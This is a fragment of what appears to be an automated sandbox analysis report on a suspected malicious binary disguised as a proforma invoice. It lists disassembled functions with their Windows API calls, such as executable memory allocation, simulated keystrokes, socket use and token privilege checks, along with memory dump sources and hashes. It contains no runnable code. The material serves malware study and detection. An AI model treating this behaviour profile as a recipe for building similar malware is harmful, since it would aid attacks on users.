                                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,00000001,002C8CF4,?,002DF910), ref: 002C90EE
                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 002C9100
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                    • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                                    • API String ID: 2574300362-199464113
                                                                                                                    • Opcode ID: 454e407bdc4430438be737576721166b290f816a47dcb1cd9cb20ddf4213fd08
                                                                                                                    • Instruction ID: 2a635e33d4beeb730aa709824755888f2896c067ce83815de14ffd256e9464ef
                                                                                                                    • Opcode Fuzzy Hash: 454e407bdc4430438be737576721166b290f816a47dcb1cd9cb20ddf4213fd08
                                                                                                                    • Instruction Fuzzy Hash: B9D01234921713CFD7209F31E91D64676D5AF05355B15883FD49AD6590E7B0C8D0C690
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: LocalTime__swprintf
                                                                                                                    • String ID: %.3d$WIN_XPe
                                                                                                                    • API String ID: 2070861257-2409531811
                                                                                                                    • Opcode ID: 26168a253722b5a2fa29d4fe65c4505ec3398d1d4ce3a1315bbc455766da1985
                                                                                                                    • Instruction ID: 23e541b17f297bbd4f47d6d745b827c5068203aadc7ee4c83079a269643b212e
                                                                                                                    • Opcode Fuzzy Hash: 26168a253722b5a2fa29d4fe65c4505ec3398d1d4ce3a1315bbc455766da1985
                                                                                                                    • Instruction Fuzzy Hash: 8BD01271C3510BEACF0496D298998F9B37CAB08701F500452F90692080E3B18B74EA25
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: f9f70dedeaf50ff2409d2c06a6da3f4c078c3d8cb03d974fa6f8cef23b1b8378
                                                                                                                    • Instruction ID: 4caefed0000f1bf44a10af7e48b80ec5f5d1824d60ec60fb36f480d4405cbc09
                                                                                                                    • Opcode Fuzzy Hash: f9f70dedeaf50ff2409d2c06a6da3f4c078c3d8cb03d974fa6f8cef23b1b8378
                                                                                                                    • Instruction Fuzzy Hash: D7C18D74A14216EFCB14CFA4CC84EAEBBB5FF49304B158598E805EB251DB30ED91DB94
                                                                                                                    APIs
                                                                                                                    • CharLowerBuffW.USER32(?,?), ref: 002CE0BE
                                                                                                                    • CharLowerBuffW.USER32(?,?), ref: 002CE101
                                                                                                                      • Part of subcall function 002CD7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 002CD7C5
                                                                                                                    • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 002CE301
                                                                                                                    • _memmove.LIBCMT ref: 002CE314
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: BuffCharLower$AllocVirtual_memmove
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3659485706-0
                                                                                                                    • Opcode ID: e1f2c6afbdf302217d7919f4a3517826284b0fda3bc4bad0a6e6e3e45db78a02
                                                                                                                    • Instruction ID: 0cc57477abb52c2dc22433b902088b16da0872285e7814b99a7aa2b77b764ddd
                                                                                                                    • Opcode Fuzzy Hash: e1f2c6afbdf302217d7919f4a3517826284b0fda3bc4bad0a6e6e3e45db78a02
                                                                                                                    • Instruction Fuzzy Hash: 71C135716283019FCB14DF28C480A6ABBE4FF89314F058A6EF8999B351D770E955CF82
                                                                                                                    APIs
                                                                                                                    • CoInitialize.OLE32(00000000), ref: 002C80C3
                                                                                                                    • CoUninitialize.OLE32 ref: 002C80CE
                                                                                                                      • Part of subcall function 002AD56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 002AD5D4
                                                                                                                    • VariantInit.OLEAUT32(?), ref: 002C80D9
                                                                                                                    • VariantClear.OLEAUT32(?), ref: 002C83AA
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 780911581-0
                                                                                                                    • Opcode ID: 778c46129393d5fb7c62f9d902ed1e30ce6f69a4e63e2f9c34fb95bb065d5adc
                                                                                                                    • Instruction ID: 78a81d6aeb0cdad1aad1064be64f70c8d78d48b4ae7bcf576f38363d5470593c
                                                                                                                    • Opcode Fuzzy Hash: 778c46129393d5fb7c62f9d902ed1e30ce6f69a4e63e2f9c34fb95bb065d5adc
                                                                                                                    • Instruction Fuzzy Hash: 32A14535624B419FCB00DF54C885B2AB7E4BF89314F08854DF99A9B3A1CB70EC54CB86
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Variant$AllocClearCopyInitString
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2808897238-0
                                                                                                                    • Opcode ID: e0bf0cc7a12f9eb229ae6235b6f7606e1f4163a709465c53910cdd3305b4fff1
                                                                                                                    • Instruction ID: b46a0be22e13801cad86e9579a443a88f49a79ec519d8a47ef6c1a656b55e7ed
                                                                                                                    • Opcode Fuzzy Hash: e0bf0cc7a12f9eb229ae6235b6f7606e1f4163a709465c53910cdd3305b4fff1
                                                                                                                    • Instruction Fuzzy Hash: 4251E774730702DFDB209F65D499A2AB3E5AF56310F28C81FE586D7292DF74D8A48B04
                                                                                                                    APIs
                                                                                                                    • GetWindowRect.USER32(00C2E5C0,?), ref: 002D9863
                                                                                                                    • ScreenToClient.USER32(00000002,00000002), ref: 002D9896
                                                                                                                    • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 002D9903
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$ClientMoveRectScreen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3880355969-0
                                                                                                                    • Opcode ID: cae2635b47584280889c01ea16401fa5f244374a636d4fb5f0c109a1a35ce20a
                                                                                                                    • Instruction ID: a9ee5a4895a2a7b719f2d5b37345185a31b61cb132252a5a57520a4cb0a48f8a
                                                                                                                    • Opcode Fuzzy Hash: cae2635b47584280889c01ea16401fa5f244374a636d4fb5f0c109a1a35ce20a
                                                                                                                    • Instruction Fuzzy Hash: E1515E34A10209EFCB10CF18D894AAE7BB5FF45760F14815AF8659B3A0D731AD91DB90
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 002A9AD2
                                                                                                                    • __itow.LIBCMT ref: 002A9B03
                                                                                                                      • Part of subcall function 002A9D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 002A9DBE
                                                                                                                    • SendMessageW.USER32(?,0000110A,00000001,?), ref: 002A9B6C
                                                                                                                    • __itow.LIBCMT ref: 002A9BC3
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$__itow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3379773720-0
                                                                                                                    • Opcode ID: 81421e26daf7a4314205bf6434e5d17a3cdacabc4c54192a9b5c17aa08a940d2
                                                                                                                    • Instruction ID: fc65f174ac653638e35000e135eb17243a868e6bcf422044cad87433504482ab
                                                                                                                    • Opcode Fuzzy Hash: 81421e26daf7a4314205bf6434e5d17a3cdacabc4c54192a9b5c17aa08a940d2
                                                                                                                    • Instruction Fuzzy Hash: F241CF70A10209ABDF11EF55D845BFE7BB9EF45715F000069FD05A3291DB709AA8CBA1
                                                                                                                    APIs
                                                                                                                    • socket.WSOCK32(00000002,00000002,00000011), ref: 002C69D1
                                                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 002C69E1
                                                                                                                      • Part of subcall function 00259837: __itow.LIBCMT ref: 00259862
                                                                                                                      • Part of subcall function 00259837: __swprintf.LIBCMT ref: 002598AC
                                                                                                                    • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 002C6A45
                                                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 002C6A51
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast$__itow__swprintfsocket
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2214342067-0
                                                                                                                    • Opcode ID: af89b89616ddfb24cd4e934d66443847b323374b9b1470a9ee2dd7766e0d58ce
                                                                                                                    • Instruction ID: 14f1137297dcb360daf587337376cfc9dadbd390c6c1a35b1836f1318584c2c9
                                                                                                                    • Opcode Fuzzy Hash: af89b89616ddfb24cd4e934d66443847b323374b9b1470a9ee2dd7766e0d58ce
                                                                                                                    • Instruction Fuzzy Hash: 0D419175750200AFEB60AF24DC8AF2A77E49B04B14F14851CFE19AF2D2DBB09D548B99
                                                                                                                    APIs
                                                                                                                    • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,002DF910), ref: 002C64A7
                                                                                                                    • _strlen.LIBCMT ref: 002C64D9
                                                                                                                    Similarity
                                                                                                                    • API ID: _strlen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4218353326-0
                                                                                                                    • Opcode ID: b8fe76c6005e6c1d5c02da68813cc79694bcad7018d14558c05bf297f29b0b81
                                                                                                                    • Instruction ID: b3a1a6314727a8fe0e632396d992c32083729f60c950d442ed250ec1320ccf02
                                                                                                                    • Opcode Fuzzy Hash: b8fe76c6005e6c1d5c02da68813cc79694bcad7018d14558c05bf297f29b0b81
                                                                                                                    • Instruction Fuzzy Hash: B141C671920104ABCB14EBA4DCD9FBEB7A8AF04310F648259FC1A97292DB30AD64CF54
                                                                                                                    APIs
                                                                                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 002BB89E
                                                                                                                    • GetLastError.KERNEL32(?,00000000), ref: 002BB8C4
                                                                                                                    • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 002BB8E9
                                                                                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 002BB915
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3321077145-0
                                                                                                                    • Opcode ID: 2e6dded400eb982a8eb34d7d3cfad9011fbf63cce9646d19c38a28bd22484f1b
                                                                                                                    • Instruction ID: 03368910b6840c456d280667fdfcdf9082abf9bff9c74c10095a47f4fa7003b4
                                                                                                                    • Opcode Fuzzy Hash: 2e6dded400eb982a8eb34d7d3cfad9011fbf63cce9646d19c38a28bd22484f1b
                                                                                                                    • Instruction Fuzzy Hash: 8C414839A20A11DFCB11EF14C588A5DBBE1AF4A310F098088EC4A9B362CB30FD55CF95
                                                                                                                    APIs
                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 002D88DE
                                                                                                                    Similarity
                                                                                                                    • API ID: InvalidateRect
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 634782764-0
                                                                                                                    • Opcode ID: c764609c7fb5dc2ad9e46c4a3fdae64beb8a6ab75f6ec1f475e39635a49c3505
                                                                                                                    • Instruction ID: 27a59dc21c6f10eaa5032fdc1921e7d7ab40a4ce8014631518fab888f089e2f6
                                                                                                                    • Opcode Fuzzy Hash: c764609c7fb5dc2ad9e46c4a3fdae64beb8a6ab75f6ec1f475e39635a49c3505
                                                                                                                    • Instruction Fuzzy Hash: 8731C134620109EFEB219F58DC59FFC77A5EB09310FA44113FA91E63A1CA70ED609B96
                                                                                                                    APIs
                                                                                                                    • ClientToScreen.USER32(?,?), ref: 002DAB60
                                                                                                                    • GetWindowRect.USER32(?,?), ref: 002DABD6
                                                                                                                    • PtInRect.USER32(?,?,002DC014), ref: 002DABE6
                                                                                                                    • MessageBeep.USER32(00000000), ref: 002DAC57
                                                                                                                    Similarity
                                                                                                                    • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1352109105-0
                                                                                                                    • Opcode ID: 4f64e53043eaa83711519e3509e5cf41b21b485024da791f0530aa84603e0c5e
                                                                                                                    • Instruction ID: ab305b5964abe42fd228c7cd0bf714d81a84d48bf427d6c937bd1a027eb8afb2
                                                                                                                    • Opcode Fuzzy Hash: 4f64e53043eaa83711519e3509e5cf41b21b485024da791f0530aa84603e0c5e
                                                                                                                    • Instruction Fuzzy Hash: AD413830A20119DFCB11DF58D884EA97BF5BB49720F1880ABE8159B360D730AD51CB92
                                                                                                                    APIs
                                                                                                                    • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 002B0B27
                                                                                                                    • SetKeyboardState.USER32(00000080,?,00000001), ref: 002B0B43
                                                                                                                    • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 002B0BA9
                                                                                                                    • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 002B0BFB
                                                                                                                    Similarity
                                                                                                                    • API ID: KeyboardState$InputMessagePostSend
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 432972143-0
                                                                                                                    • Opcode ID: f174229552de80ee41531278a87affe54d83eeff8720e532762b29ce117c3953
                                                                                                                    • Instruction ID: 2f7332a1ff1e464390c78de352f6b5401f8cbc107d4720eb9832ad6e926f2242
                                                                                                                    • Opcode Fuzzy Hash: f174229552de80ee41531278a87affe54d83eeff8720e532762b29ce117c3953
                                                                                                                    • Instruction Fuzzy Hash: 7D319A30D60209AEFF328F258C89BFBBBA9EB4539CF08435AE591521E1C3B48D609755
                                                                                                                    APIs
                                                                                                                    • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 002B0C66
                                                                                                                    • SetKeyboardState.USER32(00000080,?,00008000), ref: 002B0C82
                                                                                                                    • PostMessageW.USER32(00000000,00000101,00000000), ref: 002B0CE1
                                                                                                                    • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 002B0D33
                                                                                                                    Similarity
                                                                                                                    • API ID: KeyboardState$InputMessagePostSend
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 432972143-0
                                                                                                                    • Opcode ID: 975b192b549689d55146ce2b1b830cf9fcec7a78bf56a2e63ca0b2bf638e6670
                                                                                                                    • Instruction ID: 012e32564ad0b82a6b5538164806565bf06173bee030cc2101308650ec557402
                                                                                                                    • Opcode Fuzzy Hash: 975b192b549689d55146ce2b1b830cf9fcec7a78bf56a2e63ca0b2bf638e6670
                                                                                                                    • Instruction Fuzzy Hash: 693166309202096EFF328E659C58BFFBF66EB45360F04831BE481521D1C7789D658795
                                                                                                                    APIs
                                                                                                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 002861FB
                                                                                                                    • __isleadbyte_l.LIBCMT ref: 00286229
                                                                                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00286257
                                                                                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0028628D
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3058430110-0
                                                                                                                    • Opcode ID: 8d67987681a3dfa73002bea28d0d967ff72ad5c9842557dc6ebfed1899615713
                                                                                                                    • Instruction ID: b69e2f6f35adfdf70cf374ee0e74e3829f20727f87c14f06e5be0b328300ac96
                                                                                                                    • Opcode Fuzzy Hash: 8d67987681a3dfa73002bea28d0d967ff72ad5c9842557dc6ebfed1899615713
                                                                                                                    • Instruction Fuzzy Hash: 7431C134612246AFDF21AF64CC4CBAA7BA9FF41310F154069E828971D1D771ED60DB50
                                                                                                                    APIs
                                                                                                                    • GetForegroundWindow.USER32 ref: 002D4F02
                                                                                                                      • Part of subcall function 002B3641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 002B365B
                                                                                                                      • Part of subcall function 002B3641: GetCurrentThreadId.KERNEL32 ref: 002B3662
                                                                                                                      • Part of subcall function 002B3641: AttachThreadInput.USER32(00000000,?,002B5005), ref: 002B3669
                                                                                                                    • GetCaretPos.USER32(?), ref: 002D4F13
                                                                                                                    • ClientToScreen.USER32(00000000,?), ref: 002D4F4E
                                                                                                                    • GetForegroundWindow.USER32 ref: 002D4F54
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2759813231-0
                                                                                                                    • Opcode ID: 2d8e56944deac8c5b366c22af99d588be5f49c676358c911f29da4999844d3e6
                                                                                                                    • Instruction ID: ffc24a664f75536c21c0c2154dbc423b61f214b1f22a3b4008f33bc44d2a5ad9
                                                                                                                    • Opcode Fuzzy Hash: 2d8e56944deac8c5b366c22af99d588be5f49c676358c911f29da4999844d3e6
                                                                                                                    • Instruction Fuzzy Hash: 7B312C72D10108AFDB00EFA5C9859EFB7F9EF88300F10446AE815E7241DA719E55CFA4
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00252612: GetWindowLongW.USER32(?,000000EB), ref: 00252623
                                                                                                                    • GetCursorPos.USER32(?), ref: 002DC4D2
                                                                                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0028B9AB,?,?,?,?,?), ref: 002DC4E7
                                                                                                                    • GetCursorPos.USER32(?), ref: 002DC534
                                                                                                                    • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0028B9AB,?,?,?), ref: 002DC56E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2864067406-0
                                                                                                                    • Opcode ID: a8c54da72437057e9450c4aef2890c8107125ffa9aa1955770b2b977cf4aff58
                                                                                                                    • Instruction ID: 1c1c056a1862f2da2307f790605a800f31a013a09ab19fb98c5f2b8c6ab3b7bd
                                                                                                                    • Opcode Fuzzy Hash: a8c54da72437057e9450c4aef2890c8107125ffa9aa1955770b2b977cf4aff58
                                                                                                                    • Instruction Fuzzy Hash: 9D31B635620019EFCB15CF98E858EEA7BB9EB49310F944066F9059B3A1C731AD60DFA4
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002A810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 002A8121
                                                                                                                      • Part of subcall function 002A810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 002A812B
                                                                                                                      • Part of subcall function 002A810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 002A813A
                                                                                                                      • Part of subcall function 002A810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 002A8141
                                                                                                                      • Part of subcall function 002A810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 002A8157
                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 002A86A3
                                                                                                                    • _memcmp.LIBCMT ref: 002A86C6
                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 002A86FC
                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 002A8703
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1592001646-0
                                                                                                                    • Opcode ID: 31074984c18815598b01b6c92235c18b4d0e55f05c40ee0e8f4331a81071d021
                                                                                                                    • Instruction ID: 3e9bada5ccaffad5b629714c388b7fecc1920023631032516d1530433ca46b03
                                                                                                                    • Opcode Fuzzy Hash: 31074984c18815598b01b6c92235c18b4d0e55f05c40ee0e8f4331a81071d021
                                                                                                                    • Instruction Fuzzy Hash: 35219071E51109EFEB10DFA4CA49BEEB7B8EF45705F15805AE445A7240DF30AE15CB50
                                                                                                                    APIs
                                                                                                                    • __setmode.LIBCMT ref: 002709AE
                                                                                                                      • Part of subcall function 00255A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,002B7896,?,?,00000000), ref: 00255A2C
